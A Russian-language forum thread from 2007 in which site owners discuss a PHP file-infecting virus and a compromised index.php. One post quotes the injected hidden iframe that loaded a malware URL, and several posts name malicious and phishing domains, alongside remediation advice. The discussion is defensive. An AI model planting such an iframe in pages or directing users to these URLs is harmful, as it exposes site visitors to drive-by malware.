Mihailves 0 Опубликовано: 4 июля 2007 Рассказать Опубликовано: 4 июля 2007 а как на счет. Будет ли закрыто в этом скрипте "«php.faces»'' Virus.PHP. Feast.a 02 июля, 2007 Скриптовый вирус, заражающий файлы с расширением «.php». Имеет размер 1251 байт. Написан на PHP. Деструктивная активность При запуске вирус ищет в рабочей папке и в папке на уровень выше файлы с расширением «.php». В найденных файлах вредоносная программа проверяет наличие строки «php.faces». Если строка отсутствует, вирус записывает в конец заражаемых файлов свое тело и завершает работу. Другие названия Virus.PHP.Feast.a («Лаборатория Касперского») также известен как: PHP/Faces (McAfee), PHP.Feast (Symantec), PHP/Faces.A (FRISK), PHP/Feast (Grisoft), PHP.Faces.A (SOFTWIN), PHP.Faces.A (ClamAV), PHP/Faces.A (Eset) источник http://www.securitylab.ru/virus/298674.php Цитата Ссылка на сообщение Поделиться на других сайтах
lifestar 18 Опубликовано: 4 июля 2007 Рассказать Опубликовано: 4 июля 2007 Что за строчки он дописывает и в чём его опастность? Цитата Ссылка на сообщение Поделиться на других сайтах
Mihailves 0 Опубликовано: 4 июля 2007 Рассказать Опубликовано: 4 июля 2007 (изменено) Автор на сайте источника ничего больше не указано мне всунули ссылку на "ht*p://1com.ws/exp/index.php обнаружено: троянская программа 'Trojan-Downloader.JS.Agent.ep' Изменено 4 июля 2007 пользователем Mihailves Цитата Ссылка на сообщение Поделиться на других сайтах
Kaiser 2 Опубликовано: 4 июля 2007 Рассказать Опубликовано: 4 июля 2007 Mihailves, Меня на какойто айпи скинуло и единственное, так это у м еня антифишинг сработал на адрес _http://81.95.149.235/favicon.ico Цитата Ссылка на сообщение Поделиться на других сайтах
mcaiZer-7 0 Опубликовано: 5 июля 2007 Рассказать Опубликовано: 5 июля 2007 Mihailves, 1. Компьютер на полную проверку от вирусов. 2. Сменить все пароли (мыла, аськи, фтп - абсолютно ВСЕ!). 3. Использовать Mozilla Firefox v2.0 вместо IE. Цитата Ссылка на сообщение Поделиться на других сайтах
Mihailves 0 Опубликовано: 5 июля 2007 Рассказать Опубликовано: 5 июля 2007 Автор mc -aiZer- ($) Спасибо за совет, я уже стреляный волк! прошел и не такое. я просто не нашел в движке строчку «php.faces» вот и написал в форуме, чтоб обратили внимание и если эта проблема касается DLE то ... Цитата Ссылка на сообщение Поделиться на других сайтах
LelikInside 0 Опубликовано: 5 июля 2007 Рассказать Опубликовано: 5 июля 2007 по-моему глупость, это всё равно что писать: внимание, в сети новый вирус! хотя их пачками выходит в день. Цитата Ссылка на сообщение Поделиться на других сайтах
Kaiser 2 Опубликовано: 7 июля 2007 Рассказать Опубликовано: 7 июля 2007 Выходить-то выходят, но не многие на сайтах увидешь... Чаще всего это скрипты на разгон трафика, антивирусы на них тоже реагируют... Цитата Ссылка на сообщение Поделиться на других сайтах
Mihailves 0 Опубликовано: 9 июля 2007 Рассказать Опубликовано: 9 июля 2007 Автор и вот сегодня мне снова в конце index.php вписали вот такую строчку <!-- ~ --><iframe style="border: none" width="1" height="1" src="ht*tp://1com.ws/exp/index.php" style="border: 0;"></iframe><!-- ~ --> а это адресок кидает "09.07.2007 6:35:34 URL: ht*p://shakespearecollege.com/ipublish/data/pdf/blog627u0f/index.php обнаружено: троянская программа 'Trojan-Clicker.HTML.IFrame.p' " или еще куда-то А вы говорите ерунда ! не знаю правильно или нет но я поставил на файл атрибут "только чтение". Теперь посмотрим!!!! Цитата Ссылка на сообщение Поделиться на других сайтах
Danila 8 Опубликовано: 9 июля 2007 Рассказать Опубликовано: 9 июля 2007 не знаю правильно или нет но я поставил на файл атрибут "только чтение". Теперь посмотрим!!!! Павильно, только проверь еще все компьютеры с которых выходишь по ФТП на наличие троянов и смени пароль на ФТП. Цитата Ссылка на сообщение Поделиться на других сайтах
Mihailves 0 Опубликовано: 9 июля 2007 Рассказать Опубликовано: 9 июля 2007 Автор Да народ зря не реагируете на мои сообщения вот и ht**://pc-news.ru/soft/ уже распространяет всякую заражу вот что каспер показывает 09.07.2007 20:53:42 http://ltraffic.biz/resource.php?id=4326&user=atata запрещен запрещено: фишинг-адрес http://ltraffic.biz/* URL: http://ltraffic.biz/resource.php?id=4326&user=atata Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.